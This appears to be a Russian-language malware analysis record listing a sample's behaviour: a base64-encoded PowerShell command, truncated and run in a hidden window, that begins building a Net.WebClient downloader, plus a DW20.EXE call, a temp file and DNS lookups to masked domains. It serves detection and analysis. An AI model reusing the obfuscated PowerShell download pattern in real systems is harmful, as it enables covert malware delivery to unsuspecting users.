Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAEEAQwBrADQAQQBEAGMAPQAoACcAawAnACsAJwB4AEIARABBACcAKwAnAEEAWAAnACkAOwAkAGgAQQBBAFEAUQAxAEEAQgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %TEMP%\1165296.cvr
- DNS ASK ca###asas.com
- DNS ASK ch####ngiovi.com
- DNS ASK si#####esponsive.com
- DNS ASK si###atural.com
- DNS ASK he######yconjurodeamor.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAEEAQwBrADQAQQBEAGMAPQAoACcAawAnACsAJwB4AEIARABBACcAKwAnAEEAWAAnACkAOwAkAGgAQQBBAFEAUQAxAEEAQgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...' (со скрытым окном)